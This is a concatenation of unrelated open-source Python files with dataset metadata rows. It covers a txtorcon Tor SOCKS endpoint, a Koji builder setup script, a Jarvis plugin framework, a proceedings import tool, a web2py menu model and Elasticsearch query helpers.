This is easier to use via :meth:`txtorcon.Tor.dns_resolve_ptr`
:param tor_endpoint: the Tor SOCKS endpoint to use.
:param ip: the IP address to look up.
"""
if six.PY2 and isinstance(ip, str):
ip = unicode(ip) # noqa
elif six.PY3 and isinstance(ip, bytes):
ip = ip.decode('ascii')
factory = _TorSocksFactory(
ip, 0, 'RESOLVE_PTR', None,
)
proto = yield tor_endpoint.connect(factory)
result = yield proto.when_done()
returnValue(result)
@implementer(IStreamClientEndpoint)
class TorSocksEndpoint(object):
"""
Represents an endpoint which will talk to a Tor SOCKS port.
These should usually not be instantiated directly, instead use
:meth:`txtorcon.TorConfig.socks_endpoint`.
"""
# XXX host, port args should be (host, port) tuple, or
# IAddress-implementer?
def __init__(self, socks_endpoint, host, port, tls=False):
self._proxy_ep = socks_endpoint # can be Deferred
assert self._proxy_ep is not None
if six.PY2 and isinstance(host, str):
host = unicode(host) # noqa
if six.PY3 and isinstance(host, bytes):
host = host.decode('ascii')
self._host = host
self._port = port
self._tls = tls
self._socks_factory = None
self._when_address = util.SingleObserver()
def _get_address(self):
"""
Returns a Deferred that fires with the source IAddress of the
underlying SOCKS connection (i.e. usually a
twisted.internet.address.IPv4Address)
circuit.py uses this; better suggestions welcome!
"""
return self._when_address.when_fired()
@inlineCallbacks
def connect(self, factory):
# further wrap the protocol if we're doing TLS.
# "pray i do not wrap the protocol further".
if self._tls:
# XXX requires Twisted 14+
from twisted.internet.ssl import optionsForClientTLS
if self._tls is True:
context = optionsForClientTLS(self._host)
else:
context = self._tls
tls_factory = tls.TLSMemoryBIOFactory(context, True, factory)
socks_factory = _TorSocksFactory(
self._host, self._port, 'CONNECT', tls_factory,
)
else:
socks_factory = _TorSocksFactory(
self._host, self._port, 'CONNECT', factory,
)
self._socks_factory = socks_factory
# forward our address (when we get it) to any listeners
self._socks_factory._get_address().addBoth(self._when_address.fire)
# XXX isn't this just maybeDeferred()
if isinstance(self._proxy_ep, Deferred):
proxy_ep = yield self._proxy_ep
if not IStreamClientEndpoint.providedBy(proxy_ep):
raise ValueError(
"The Deferred provided as 'socks_endpoint' must "
"resolve to an IStreamClientEndpoint provider (got "
"{})".format(type(proxy_ep).__name__)
)
else:
proxy_ep = self._proxy_ep
# socks_proto = yield proxy_ep.connect(socks_factory)
proto = yield proxy_ep.connect(socks_factory)
wrapped_proto = yield proto.when_done()
if self._tls:
returnValue(wrapped_proto.wrappedProtocol)
else:
returnValue(wrapped_proto)
| mit | 3,089,544,794,076,965,400 | 29.910053 | 87 | 0.572663 | false |
ASzc/nagoya | cfg/koji-builder/setup.py | 1 | 1421 | #!/usr/bin/env python2
# References:
# https://fedoraproject.org/wiki/Koji/ServerHowTo
# https://github.com/sbadakhc/kojak/blob/master/scripts/install/install
import util.cfg as cfg
import util.pkg as pkg
import util.cred as cred
from util.log import log
#
# Setup
#
log.info("General update")
pkg.clean()
pkg.update()
log.info("Install EPEL")
pkg.install("https://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm")
#
# Kojid (Koji Builder)
#
log.info("Install Koji Builder")
pkg.install("koji-builder")
koji_url = dict()
koji_url["web"] = "http://koji/koji"
koji_url["top"] = "http://koji/kojifiles"
koji_url["hub"] = "http://koji/kojihub"
log.info("Configure Koji Builder")
with cfg.mod_ini("/etc/kojid/kojid.conf") as i:
i.kojid.sleeptime = 2
i.kojid.maxjobs = 20
i.kojid.server = koji_url["hub"]
i.kojid.topurl = koji_url["top"]
# i.kojid.cert is set at runtime
i.kojid.ca = cred.ca_crt
i.kojid.serverca = cred.ca_crt
i.kojid.smtphost = "koji"
i.kojid.from_addr = "Koji Build System <buildsys@kojibuilder>"
#
# Koji CLI
#
log.info("Configure Koji CLI")
with cfg.mod_ini("/etc/koji.conf") as i:
i.koji.server = koji_url["hub"]
i.koji.weburl = koji_url["web"]
i.koji.topurl = koji_url["top"]
i.koji.topdir = "/mnt/koji"
i.koji.cert = cred.user["kojiadmin"].pem
i.koji.ca = cred.ca_crt
i.koji.serverca = cred.ca_crt
pkg.clean()
| lgpl-3.0 | 7,909,976,828,980,517,000 | 22.295082 | 89 | 0.670654 | false |
appi147/Jarvis | jarviscli/plugin.py | 1 | 6525 | from inspect import cleandoc, isclass
import pluginmanager
from requests import ConnectionError
# Constants
# platform
MACOS = "MACOS"
LINUX = "LINUX"
WINDOWS = "WINDOWS"
# Shortcut for MACOS + LINUX
UNIX = "UNIX"
def plugin(name):
"""
Convert function in Plugin Class
@python(platform=LINUX, native="ap-hotspot")
def hotspot_start(jarvis, s):
system("sudo ap-hotspot start")
"""
def create_plugin(run):
plugin_class = type(
run.__name__, Plugin.__bases__, dict(
Plugin.__dict__))
plugin_class.__doc__ = run.__doc__
if isclass(run):
# class -> object
run = run()
# create class
plugin_class._require = []
plugin_class._complete = []
plugin_class._alias = []
plugin_class._name = name
plugin_class._backend = (run,)
plugin_class._backend_instance = run
return plugin_class
return create_plugin
def require(network=None, platform=None, native=None):
require = []
if network is not None:
require.append(('network', network))
if platform is not None:
require.append(('platform', platform))
if native is not None:
require.append(('native', native))
def __require(plugin):
plugin._require.extend(require)
return plugin
return __require
def complete(*complete):
def __complete(plugin):
plugin._complete.extend(complete)
return plugin
return __complete
def alias(*alias):
def __alias(plugin):
plugin._alias.extend(alias)
return plugin
return __alias
def _yield_something(values):
for value in values:
yield value
class PluginStorage(object):
def __init__(self):
self._sub_plugins = {}
def add_plugin(self, name, plugin_to_add):
self._sub_plugins[name] = plugin_to_add
def get_plugins(self, name=None):
if name is None:
return self._sub_plugins
if name in self._sub_plugins:
return self._sub_plugins[name]
return None
def change_with(self, plugin_new):
plugin_new._sub_plugins = self._sub_plugins
class Plugin(pluginmanager.IPlugin, PluginStorage):
"""
"""
_backend = None
def __init__(self):
super(pluginmanager.IPlugin, self).__init__()
self._sub_plugins = {}
def init(self, jarvis_api):
"""
Called before Jarvis starts;
Passes jarvis_api object for plugins to do initialization.
(would not be possible with __init__)
"""
if self.is_callable_plugin():
if hasattr(
self._backend[0].__class__,
"init") and callable(
getattr(
self._backend[0].__class__,
"init")):
self._backend[0].init(jarvis_api)
for plugin in self.get_plugins().values():
plugin.init(jarvis_api)
def is_callable_plugin(self):
"""
Return True, if this plugin has a executable implementation (e.g. news)
Return False, if this instance is only used for calling other plugins
(e.g. movie in 'movie search' and 'movie plot')
"""
return self._backend is not None
def get_name(self):
"""Set with @plugin(name)"""
return self._name
def require(self):
"""Set with @require"""
return self._require
def alias(self):
"""Set with @alias"""
return self._alias
def complete(self):
"""Set with @complete"""
# return default complete() if possible
if self.is_callable_plugin():
for complete in self._complete:
yield complete
# yield each sub command
for complete in self.get_plugins().keys():
yield complete
def get_doc(self):
"""Parses plugin doc string"""
doc = ""
examples = ""
extended_doc = ""
# default complete
if self.__doc__ is not None:
default_command_doc = cleandoc(self.__doc__)
default_command_doc = default_command_doc.split("-- Example:")
if len(default_command_doc) > 1:
examples += default_command_doc[1]
default_command_doc = default_command_doc[0]
doc += default_command_doc
if not doc.endswith("\n"):
doc += "\n"
doc += "\nSubcommands:"
# sub command complete
for name, sub_command in self.get_plugins().items():
doc += "\n-> {}: ".format(name)
sub_command_doc = sub_command.get_doc()
sub_command_doc = sub_command_doc.split("-- Example:")
if len(sub_command_doc) > 1:
examples += sub_command_doc[1]
sub_command_doc = sub_command_doc[0]
if '\n' not in sub_command_doc:
doc += sub_command_doc
else:
extended_doc += "\n {}:\n".format(name)
extended_doc += sub_command_doc
if not sub_command_doc.endswith("\n"):
extended_doc += "\n"
if extended_doc != "":
doc += "\n"
doc += extended_doc
if examples != "":
doc += "\n--Examples:"
doc += examples
return doc
def run(self, jarvis, s):
"""Entry point if this plugin is called"""
sub_command = jarvis.find_action(s, self.get_plugins().keys())
if sub_command is "None":
# run default
if self.is_callable_plugin():
self._backend[0](jarvis.get_api(), s)
else:
jarvis.get_api().say("Sorry, I could not recognise your command. Did you mean:")
for sub_command in self._sub_plugins.keys():
jarvis.get_api().say(" * {} {}".format(self.get_name(), sub_command))
else:
command = sub_command.split()[0]
new_s = " ".join(sub_command.split()[1:])
self.get_plugins(command).run(jarvis, new_s)
def _plugin_run_with_network_error(self, run_func, jarvis, s):
"""
Calls run_func(jarvis, s); try-catch ConnectionError
This method is auto-used if require() yields ("network", True). Do not
use m
"""
try:
run_func(jarvis, s)
except ConnectionError:
jarvis.get_api().connection_error()
| mit | 4,146,784,341,586,826,000 | 27.49345 | 96 | 0.540383 | false |
brigittebigi/proceed | proceed/scripts/import.py | 1 | 9928 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# ---------------------------------------------------------------------------
# ___ __ ___ ___ ____ ____ __
# | \ | \ | | / | | | \ Automatic
# |__/ |__/ | | | |__ |__ | | Conference
# | |\_ | | | | | | | Proceedings
# | | \ |___| \___ |___ |___ |__/ Generator
# ==========================================================
#
# http://www.lpl-aix.fr/~bigi/
#
# ---------------------------------------------------------------------------
# developed at:
#
# Laboratoire Parole et Langage
#
# Copyright (C) 2013-2014 Brigitte Bigi
#
# Use of this software is governed by the GPL, v3
# This banner notice must not be removed
# ---------------------------------------------------------------------------
#
# SPPAS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SPPAS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------
__docformat__ = "epytext"
"""
Import abstracts from a conference and save them in a directory,
in the form of one latex file per abstract.
Input can be one of sciencesconf XML file or easychair CSV file.
No options for the output style: use default.
"""
# ---------------------------------------------------------------------------
import sys
import os.path
import getopt
sys.path.append( os.path.join(os.path.dirname(os.path.dirname( os.path.abspath(__file__))), "src") )
from DataIO.Read.reader import Reader
from DataIO.Write.writer import Writer
from structs.prefs import Preferences
from structs.abstracts_themes import all_themes
from term.textprogress import TextProgress
from term.terminalcontroller import TerminalController
from sp_glob import program, author, version, copyright, url
wxop = True
try:
import wx
from wxgui.frames.import_wizard import ImportWizard
except Exception:
wxop = False
# ----------------------------------------------------------------------
# USEFUL FUNCTIONS
# ----------------------------------------------------------------------
def usage(output):
"""
Print the usage of this script on an output.
@param output is a string representing the output (for example: sys.stdout)
"""
output.write('import.py [options] where options are:\n')
output.write(' -i file Input file name [required] \n')
output.write(' -a file Authors Input file name [required if easychair] \n')
output.write(' -o output Output directory [required] \n')
output.write(' -s status Status number (0-4) [default=1=accepted]\n')
output.write(' -r reader name One of: sciencesconf or easychair [default=sciencesconf]\n')
output.write(' -S style name One of: basic, palme, nalte [default=basic]\n')
output.write(' -c compiler One of: pdflatex, xetex [default=pdflatex]\n')
output.write(' --nocsv Do not generate '+program+' CSV files\n')
output.write(' --notex Do not generate LaTeX files\n')
output.write(' --nohtml Do not generate HTML file\n')
output.write(' --help Print this help\n\n')
# End usage
# ----------------------------------------------------------------------
def Quit(message=None, status=0, usageoutput=None):
"""
Quit the program with the appropriate exit status.
@param message is a text to communicate to the user on sys.stderr.
@param status is an integer of the status exit value.
@param usageoutput is a file descriptor.
"""
if message: sys.stderr.write('export.py '+message)
if usageoutput: usage(usageoutput)
sys.exit(status)
# End Quit
# ----------------------------------------------------------------------
# --------------------------------------------------------------------------
# MAIN PROGRAM
# --------------------------------------------------------------------------
if __name__=="__main__":
# ----------------------------------------------------------------------
# Get all arguments, verify inputs.
# ----------------------------------------------------------------------
# Verify the program name and possibly some arguments
if len(sys.argv) == 1:
if not wxop:
# stop the program and print an error message
Quit(status=1, usageoutput=sys.stderr)
else:
app = wx.App(False)
ImportWizard(None)
app.MainLoop()
sys.exit(0)
# Get options (if any...)
try:
opts, args = getopt.getopt(sys.argv[1:], "i:a:o:s:r:S:c:", ["help", "nocsv", "notex", "nohtml"])
except getopt.GetoptError, err:
# Print help information and exit:
Quit(message="Error: "+str(err)+".\nUse option --help for any help.\n", status=1)
fileinput = None
authorsinput = None
output = None
extension = "tex"
status = 1 # only accepted papers
readername = "sciencesconf"
themename = "basic"
compiler = "pdflatex"
exportcsv = True
exporttex= True
exporthtml = True
# Extract options
for o, a in opts:
if o == "-i":
fileinput = a
elif o == "-a":
authorsinput = a
elif o == "-o":
output = a
elif o == "-s":
status = int(a)
elif o == "-r":
readername = a
elif o == "-S":
themename = a
elif o == "-c":
compiler = a
elif o == "--help": # need help
Quit(message='Help', status=0, usageoutput=sys.stdout)
elif o == "--nocsv":
exportcsv = False
elif o == "--notex":
exporttex = False
elif o == "--nohtml":
exporthtml = False
# Verify args
if fileinput is not None:
if not os.path.exists(fileinput):
Quit(message="Error: BAD input file name: "+fileinput+"\n", status=1)
else:
Quit(message="Error: an input is required.\n.", status=1, usageoutput=sys.stderr)
if output is None:
Quit(message="Error: an output is required.\n.", status=1, usageoutput=sys.stderr)
if readername == "easychair" and not authorsinput:
Quit(message="With easychair, an input file with authors is required.", status=1, usageoutput=sys.stderr)
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}'+program+' - Version '+version+'${NORMAL}')
print term.render('${BLUE}'+copyright+'${NORMAL}')
print term.render('${BLUE}'+url+'${NORMAL}')
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print '-----------------------------------------------------------------------\n'
print program+' - Version '+version
print copyright
print url+'\n'
print '-----------------------------------------------------------------------\n'
# ----------------------------------------------------------------------
p = TextProgress()
# ----------------------------------------------------------------------
# Load input data
# ----------------------------------------------------------------------
arguments = {}
arguments['readername'] = readername
arguments['filename'] = fileinput
arguments['authorsfilename'] = authorsinput
arguments['progress'] = p
reader = Reader( arguments )
# ----------------------------------------------------------------------
# Write output data (with default parameters)
# ----------------------------------------------------------------------
# Create preferences
prefs = Preferences()
theme = all_themes.get_theme(themename.lower())
prefs.SetTheme( theme )
prefs.SetValue('COMPILER', 'str', compiler.strip())
# Create the Writer
writer = Writer( reader.docs )
writer.set_status( status )
writer.set_progress( p )
# Write abstracts as LaTeX
if exporttex:
writer.writeLaTeX_as_Dir( output, prefs, tocompile=True )
# Write proceed native CSV files
if exportcsv:
writer.writeCSV( output )
# Write html file
if exporthtml:
writer.writeHTML( output+".html" )
# Done
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}Result is in '+output)
print term.render('${GREEN}Thank you for using '+program+".")
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print ('-----------------------------------------------------------------------\n')
print "Result is in "+output+".\nThank you for using "+program+"."
print ('-----------------------------------------------------------------------\n')
# ----------------------------------------------------------------------
| gpl-3.0 | -6,585,036,941,953,271,000 | 36.044776 | 119 | 0.463638 | false |
zvolsky/muzika | models/menu.py | 1 | 6740 | # -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A(B('web',SPAN(2),'py'),XML('™ '),
_class="brand",_href="http://www.web2py.com/")
response.title = request.application.replace('_',' ').title()
response.subtitle = ''
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <[email protected]>'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
#########################################################################
response.menu = [
(T('Rozpis'), False, URL('default', 'index'), [
(T('Můj rozpis'), False, URL('default', 'index'), []),
]),
]
if auth.has_membership('rozpis'):
response.menu[0][3].append((T('Celkový rozpis'), False, URL('default', 'rozpis'), []))
if auth.has_membership('admin'):
response.menu.append((T('Číselníky'), False, None, [
(T('Práva uživatelů'), False, URL('plugin_manage_groups', 'index'), []),
(T('Muzikanti (uživatelé)'), False, URL('default', 'muzikanti'), []),
(T('Místa'), False, URL('default', 'mista'), []),
]))
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
# shortcuts
app = request.application
ctr = request.controller
# useful links to internal and external resources
response.menu += [
(SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
(T('My Sites'), False, URL('admin', 'default', 'site')),
(T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
(T('Controller'), False,
URL(
'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
(T('View'), False,
URL(
'admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
(T('Layout'), False,
URL(
'admin', 'default', 'edit/%s/views/layout.html' % app)),
(T('Stylesheet'), False,
URL(
'admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
(T('DB Model'), False,
URL(
'admin', 'default', 'edit/%s/models/db.py' % app)),
(T('Menu Model'), False,
URL(
'admin', 'default', 'edit/%s/models/menu.py' % app)),
(T('Database'), False, URL(app, 'appadmin', 'index')),
(T('Errors'), False, URL(
'admin', 'default', 'errors/' + app)),
(T('About'), False, URL(
'admin', 'default', 'about/' + app)),
]),
('web2py.com', False, 'http://www.web2py.com', [
(T('Download'), False,
'http://www.web2py.com/examples/default/download'),
(T('Support'), False,
'http://www.web2py.com/examples/default/support'),
(T('Demo'), False, 'http://web2py.com/demo_admin'),
(T('Quick Examples'), False,
'http://web2py.com/examples/default/examples'),
(T('FAQ'), False, 'http://web2py.com/AlterEgo'),
(T('Videos'), False,
'http://www.web2py.com/examples/default/videos/'),
(T('Free Applications'),
False, 'http://web2py.com/appliances'),
(T('Plugins'), False, 'http://web2py.com/plugins'),
(T('Layouts'), False, 'http://web2py.com/layouts'),
(T('Recipes'), False, 'http://web2pyslices.com/'),
(T('Semantic'), False, 'http://web2py.com/semantic'),
]),
(T('Documentation'), False, 'http://www.web2py.com/book', [
(T('Preface'), False,
'http://www.web2py.com/book/default/chapter/00'),
(T('Introduction'), False,
'http://www.web2py.com/book/default/chapter/01'),
(T('Python'), False,
'http://www.web2py.com/book/default/chapter/02'),
(T('Overview'), False,
'http://www.web2py.com/book/default/chapter/03'),
(T('The Core'), False,
'http://www.web2py.com/book/default/chapter/04'),
(T('The Views'), False,
'http://www.web2py.com/book/default/chapter/05'),
(T('Database'), False,
'http://www.web2py.com/book/default/chapter/06'),
(T('Forms and Validators'), False,
'http://www.web2py.com/book/default/chapter/07'),
(T('Email and SMS'), False,
'http://www.web2py.com/book/default/chapter/08'),
(T('Access Control'), False,
'http://www.web2py.com/book/default/chapter/09'),
(T('Services'), False,
'http://www.web2py.com/book/default/chapter/10'),
(T('Ajax Recipes'), False,
'http://www.web2py.com/book/default/chapter/11'),
(T('Components and Plugins'), False,
'http://www.web2py.com/book/default/chapter/12'),
(T('Deployment Recipes'), False,
'http://www.web2py.com/book/default/chapter/13'),
(T('Other Recipes'), False,
'http://www.web2py.com/book/default/chapter/14'),
(T('Buy this book'), False,
'http://stores.lulu.com/web2py'),
]),
(T('Community'), False, None, [
(T('Groups'), False,
'http://www.web2py.com/examples/default/usergroups'),
(T('Twitter'), False, 'http://twitter.com/web2py'),
(T('Live Chat'), False,
'http://webchat.freenode.net/?channels=web2py'),
]),
(T('Plugins'), False, None, [
('plugin_wiki', False,
'http://web2py.com/examples/default/download'),
(T('Other Plugins'), False,
'http://web2py.com/plugins'),
(T('Layout Plugins'),
False, 'http://web2py.com/layouts'),
])
]
)]
if DEVELOPMENT_MENU: _()
if "auth" in locals(): auth.wikimenu()
| agpl-3.0 | -2,985,467,640,629,348,000 | 43.562914 | 90 | 0.480755 | false |
klahnakoski/cloc | cloc/util/queries/es_query_util.py | 1 | 16380 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import unicode_literals
from __future__ import division
from datetime import datetime
from .. import struct
from ..cnv import CNV
from .. import strings
from ..collections import COUNT
from ..maths import stats
from ..env.elasticsearch import Index
from ..env.logs import Log
from ..maths import Math
from ..queries import domains, MVEL, filters
from ..struct import nvl, StructList, Struct, split_field, join_field
from ..structs.wraps import wrap
from ..times import durations
TrueFilter = {"match_all": {}}
DEBUG = False
INDEX_CACHE = {} # MATCH NAMES TO FULL CONNECTION INFO
def loadColumns(es, frum):
"""
ENSURE COLUMNS FOR GIVEN INDEX/QUERY ARE LOADED, AND MVEL COMPILATION WORKS BETTER
"""
if isinstance(frum, basestring):
if frum in INDEX_CACHE:
return INDEX_CACHE[frum]
frum = Struct(
name=frum
)
else:
if not frum.name:
Log.error("Expecting from clause to have a name")
if frum.name in INDEX_CACHE:
return INDEX_CACHE[frum.name]
# FILL frum WITH DEFAULTS FROM es.settings
struct.set_default(frum, es.settings)
if not frum.host:
Log.error("must have host defined")
# DETERMINE IF THE es IS FUNCTIONALLY DIFFERENT
diff = False
for k, v in es.settings.items():
if k != "name" and v != frum[k]:
diff = True
if diff:
es = Index(frum)
output = wrap(frum).copy()
schema = es.get_schema()
properties = schema.properties
output.es = es
root = split_field(frum.name)[0]
if root != frum.name:
INDEX_CACHE[frum.name] = output
loadColumns(es, root)
else:
INDEX_CACHE[root] = output
output.columns = parseColumns(frum.index, root, properties)
return output
def post(es, esQuery, limit):
if not esQuery.facets and esQuery.size == 0:
Log.error("ESQuery is sending no facets")
# DO NOT KNOW WHY THIS WAS HERE
# if isinstance(query.select, list) or len(query.edges) and not esQuery.facets.keys and esQuery.size == 0:
# Log.error("ESQuery is sending no facets")
postResult = None
try:
postResult = es.search(esQuery)
for facetName, f in postResult.facets:
if f._type == "statistical":
return None
if not f.terms:
return None
if not DEBUG and not limit and len(f.terms) == limit:
Log.error("Not all data delivered (" + str(len(f.terms)) + "/" + str(f.total) + ") try smaller range")
except Exception, e:
Log.error("Error with ESQuery", e)
return postResult
def buildESQuery(query):
output = wrap({
"query": {"match_all": {}},
"from": 0,
"size": 100 if DEBUG else 0,
"sort": [],
"facets": {
}
})
if DEBUG:
# TO LIMIT RECORDS TO WHAT'S IN FACETS
output.query = {
"filtered": {
"query": {
"match_all": {}
},
"filter": filters.simplify(query.where)
}
}
return output
def parseColumns(index_name, parent_path, esProperties):
"""
RETURN THE COLUMN DEFINITIONS IN THE GIVEN esProperties OBJECT
"""
columns = StructList()
for name, property in esProperties.items():
if parent_path:
path = join_field(split_field(parent_path) + [name])
else:
path = name
childColumns = None
if property.type == "nested" and property.properties:
# NESTED TYPE IS A NEW TYPE DEFINITION
if path not in INDEX_CACHE:
INDEX_CACHE[path] = INDEX_CACHE[parent_path].copy()
INDEX_CACHE[path].name = path
INDEX_CACHE[path].columns = childColumns
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": True
})
continue
if property.properties:
childColumns = parseColumns(index_name, path, property.properties)
columns.extend(childColumns)
columns.append({
"name": join_field(split_field(path)[1::]),
"type": "object",
"useSource": True
})
if property.dynamic:
continue
if not property.type:
continue
if property.type == "multi_field":
property.type = property.fields[name].type # PULL DEFAULT TYPE
for i, n, p in enumerate(property.fields):
if n == name:
# DEFAULT
columns.append({"name": struct.join_field(split_field(path)[1::]), "type": p.type, "useSource": p.index == "no"})
else:
columns.append({"name": struct.join_field(split_field(path)[1::]) + "\\." + n, "type": p.type, "useSource": p.index == "no"})
continue
if property.type in ["string", "boolean", "integer", "date", "long", "double"]:
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": property.index == "no"
})
if property.index_name and name != property.index_name:
columns.append({
"name": property.index_name,
"type": property.type,
"useSource": property.index == "no"
})
elif property.enabled == False:
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": "yes"
})
else:
Log.warning("unknown type {{type}} for property {{path}}", {"type": property.type, "path": path})
# SPECIAL CASE FOR PROPERTIES THAT WILL CAUSE OutOfMemory EXCEPTIONS
for c in columns:
if name == "bugs" and (c.name == "dependson" or c.name == "blocked"):
c.useSource = True
return columns
def compileTime2Term(edge):
"""
RETURN MVEL CODE THAT MAPS TIME AND DURATION DOMAINS DOWN TO AN INTEGER AND
AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
"""
if edge.esscript:
Log.error("edge script not supported yet")
# IS THERE A LIMIT ON THE DOMAIN?
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
nullTest = compileNullTest(edge)
ref = nvl(edge.domain.min, edge.domain.max, datetime(2000, 1, 1))
if edge.domain.interval.month > 0:
offset = ref.subtract(ref.floorMonth(), durations.DAY).milli
if offset > durations.DAY.milli * 28:
offset = ref.subtract(ref.ceilingMonth(), durations.DAY).milli
partition2int = "milli2Month(" + value + ", " + MVEL.value2MVEL(offset) + ")"
partition2int = "((" + nullTest + ") ? 0 : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == 0:
return edge.domain.NULL
d = datetime(str(value)[:4:], str(value).right(2), 1)
d = d.addMilli(offset)
return edge.domain.getPartByKey(d)
else:
partition2int = "Math.floor((" + value + "-" + MVEL.value2MVEL(ref) + ")/" + edge.domain.interval.milli + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey(ref.add(edge.domain.interval.multiply(value)))
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
# RETURN MVEL CODE THAT MAPS DURATION DOMAINS DOWN TO AN INTEGER AND
# AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
def compileDuration2Term(edge):
if edge.esscript:
Log.error("edge script not supported yet")
# IS THERE A LIMIT ON THE DOMAIN?
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
ref = nvl(edge.domain.min, edge.domain.max, durations.ZERO)
nullTest = compileNullTest(edge)
ms = edge.domain.interval.milli
if edge.domain.interval.month > 0:
ms = durations.YEAR.milli / 12 * edge.domain.interval.month
partition2int = "Math.floor((" + value + "-" + MVEL.value2MVEL(ref) + ")/" + ms + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey(ref.add(edge.domain.interval.multiply(value)))
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
# RETURN MVEL CODE THAT MAPS THE numeric DOMAIN DOWN TO AN INTEGER AND
# AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
def compileNumeric2Term(edge):
if edge.script:
Log.error("edge script not supported yet")
if edge.domain.type != "numeric" and edge.domain.type != "count":
Log.error("can only translate numeric domains")
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
if not edge.domain.max:
if not edge.domain.min:
ref = 0
partition2int = "Math.floor(" + value + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "false"
else:
ref = MVEL.value2MVEL(edge.domain.min)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "" + value + "<" + ref
elif not edge.domain.min:
ref = MVEL.value2MVEL(edge.domain.max)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "" + value + ">=" + ref
else:
top = MVEL.value2MVEL(edge.domain.max)
ref = MVEL.value2MVEL(edge.domain.min)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "(" + value + "<" + ref + ") or (" + value + ">=" + top + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
offset = CNV.value2int(ref)
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey((value * edge.domain.interval) + offset)
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
def compileString2Term(edge):
if edge.esscript:
Log.error("edge script not supported yet")
value = edge.value
if MVEL.isKeyword(value):
value = strings.expand_template("getDocValue({{path}})", {"path": CNV.string2quote(value)})
else:
Log.error("not handled")
def fromTerm(value):
return edge.domain.getPartByKey(value)
return Struct(
toTerm={"head": "", "body": value},
fromTerm=fromTerm
)
def compileNullTest(edge):
"""
RETURN A MVEL EXPRESSION THAT WILL EVALUATE TO true FOR OUT-OF-BOUNDS
"""
if edge.domain.type not in domains.ALGEBRAIC:
Log.error("can only translate time and duration domains")
# IS THERE A LIMIT ON THE DOMAIN?
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
if not edge.domain.max:
if not edge.domain.min:
return False
bot = MVEL.value2MVEL(edge.domain.min)
nullTest = "" + value + "<" + bot
elif not edge.domain.min:
top = MVEL.value2MVEL(edge.domain.max)
nullTest = "" + value + ">=" + top
else:
top = MVEL.value2MVEL(edge.domain.max)
bot = MVEL.value2MVEL(edge.domain.min)
nullTest = "(" + value + "<" + bot + ") or (" + value + ">=" + top + ")"
return nullTest
def compileEdges2Term(mvel_compiler, edges, constants):
"""
TERMS ARE ALWAYS ESCAPED SO THEY CAN BE COMPOUNDED WITH PIPE (|)
GIVE MVEL CODE THAT REDUCES A UNIQUE TUPLE OF PARTITIONS DOWN TO A UNIQUE TERM
GIVE LAMBDA THAT WILL CONVERT THE TERM BACK INTO THE TUPLE
